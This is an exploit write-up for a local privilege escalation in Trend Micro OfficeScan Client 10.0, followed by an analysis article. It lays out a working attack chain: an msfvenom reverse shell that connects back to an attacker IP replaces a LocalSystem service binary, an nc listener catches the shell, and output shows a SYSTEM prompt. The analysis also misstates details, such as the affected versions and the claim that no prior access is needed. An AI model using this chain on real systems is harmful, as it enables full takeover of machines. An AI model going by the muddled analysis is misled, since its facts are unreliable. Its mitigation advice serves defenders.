Trend Micro OfficeScan Client 10.0 - ACL Service LPE

Exploit Author: msd0pe Analysis Author: www.bubbleslearn.ir Category: Local Language: Shell Published Date: 2023-05-23 
#  Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE 
#  Date: 2023/05/04                                                     
#  Exploit Author: msd0pe                                               
#  Vendor Homepage: https://www.trendmicro.com                          
#  My Github: https://github.com/msd0pe-1                                                                                             


Trend Micro OfficeScan Client:
Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.

[1] Verify the folder rights:
    > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

    C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
                                                         NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                                                         NT AUTHORITY\SYSTEM:(F)
                                                         NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                         BUILTIN\Administrators:(F)
                                                         BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                         BUILTIN\Users:(F)
                                                         BUILTIN\Users:(OI)(CI)(IO)(F)
                                                         CREATOR OWNER:(OI)(CI)(IO)(F)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)

[2] Get informations about the services:
    > sc qc tmlisten

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: tmlisten
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT Listener
            DEPENDENCIES       : Netman
                               : WinMgmt
            SERVICE_START_NAME : LocalSystem

OR

    > sc qc ntrtscan

    SERVICE_NAME: ntrtscan
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT RealTime Scan
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem

[3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe

    OR

    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe

[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe

[5] Start listener
    > nc -lvp 4444

[6] Reboot the service/server
    > sc stop tmlisten
    > sc start tmlisten
    
    OR
    
    > sc stop ntrtscan
    > sc start ntrtscan

    OR

    > shutdown /r

[7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system


Trend Micro OfficeScan Client 10.0 - ACL Service LPE: A Critical Privilege Escalation Vulnerability

Security researchers have identified a severe privilege escalation vulnerability in Trend Micro OfficeScan Client 10.0, affecting systems running versions prior to 10.0. This flaw stems from improper access control list (ACL) permissions on the application’s installation directory, enabling attackers to escalate from a low-privileged user to LocalSystem—the highest privilege level on Windows systems—without requiring any initial access rights.

Root Cause: Misconfigured ACL Permissions

The vulnerability arises due to a critical misconfiguration in the file system permissions of the C:\Program Files (x86)\Trend Micro\OfficeScan Client directory. While the intended security model restricts access to trusted system components, the actual ACL grants full write permissions to the BUILTIN\Users group.

icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

This command reveals the ACL configuration, showing that BUILTIN\Users has (F)—full control—rights on the directory, including inheritance and propagation. This is a glaring security oversight, as it allows any standard user to modify or replace executable files within the folder.

Exploitable Services: tmlisten and ntrtscan

Two key services—tmlisten and ntrtscan—are directly exploitable due to their configuration and reliance on the vulnerable directory:

  • tmlisten: OfficeScan NT Listener, running under LocalSystem with automatic startup.
  • ntrtscan: OfficeScan NT RealTime Scan, also running under LocalSystem with no dependencies.

Both services are configured to load their binary from the vulnerable directory. Their SERVICE_START_NAME is set to LocalSystem, meaning they execute with elevated privileges, making them prime targets for exploitation.

sc qc tmlisten

Output shows:

Property Value
BINARY_PATH_NAME "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
SERVICE_START_NAME LocalSystem
START_TYPE AUTO_START

Similarly, ntrtscan follows the same pattern, making it equally exploitable.

Exploit Execution: Step-by-Step Attack

Attackers can leverage this vulnerability to execute arbitrary code with system-level privileges. Here’s a detailed breakdown of the exploit chain:

Step 1: Generate Malicious Payload

Using Metasploit, an attacker generates a reverse shell executable tailored for Windows x64:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe

This command produces a malicious tmlisten.exe that connects back to the attacker’s machine when executed. The payload is designed to be undetectable by standard antivirus tools if not specifically configured to recognize it.

Step 2: Upload and Replace the Service Binary

With write access to the vulnerable directory, the attacker uploads the malicious executable:

  • Copy tmlisten.exe or ntrtscan.exe to C:\Program Files (x86)\Trend Micro\OfficeScan Client.
  • Replace the original legitimate binary with the malicious version.

Since Users have full control, this operation is trivial and requires no additional privileges.

Step 3: Trigger Service Restart

After replacing the binary, the attacker restarts the service:

sc stop tmlisten
sc start tmlisten

Alternatively, a reboot can trigger the service restart:

shutdown /r

When the service starts, it loads the malicious executable instead of the original, executing it under LocalSystem context.

Step 4: Establish Reverse Shell

On the attacker’s machine, a netcat listener is set up:

nc -lvp 4444

Upon successful execution, the reverse shell connects back:

connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Result: the attacker gains full system access, enabling complete control over the target machine.

Security Implications and Real-World Impact

This vulnerability is particularly dangerous in enterprise environments where OfficeScan is widely deployed. It allows:

  • Unprivileged users to gain system-level access.
  • Attackers to bypass security controls without needing initial exploits.
  • Malware persistence through service binaries.

Furthermore, since the services are set to auto-start, the malicious payload executes automatically after reboot—making detection and removal extremely difficult.

Expert Recommendations and Mitigations

Organizations must take immediate action to prevent exploitation:

  • Upgrade to OfficeScan Client 10.1 or later—the vulnerability has been patched in newer versions.
  • Restrict ACL permissions on the OfficeScan directory to only TrustedInstaller and SYSTEM.
  • Monitor service binaries for unexpected changes using file integrity monitoring (FIM) tools.
  • Disable auto-start services if not required, or use application whitelisting to prevent unauthorized binaries.

Additionally, security teams should conduct regular audits of service configurations and file permissions—especially on legacy software with long-term deployment.

Conclusion: A Wake-Up Call for Secure Software Deployment

The Trend Micro OfficeScan Client 10.0 ACL Service LPE vulnerability exemplifies how a seemingly minor permission misconfiguration can lead to catastrophic security breaches. It underscores the importance of:

  • Principle of least privilege in file system access.
  • Regular security audits of installed software.
  • Defense-in-depth strategies, including service monitoring and binary integrity checks.

As cyberattacks grow in sophistication, vulnerabilities like this serve as a reminder that even trusted security software can become a vector for compromise if not properly secured.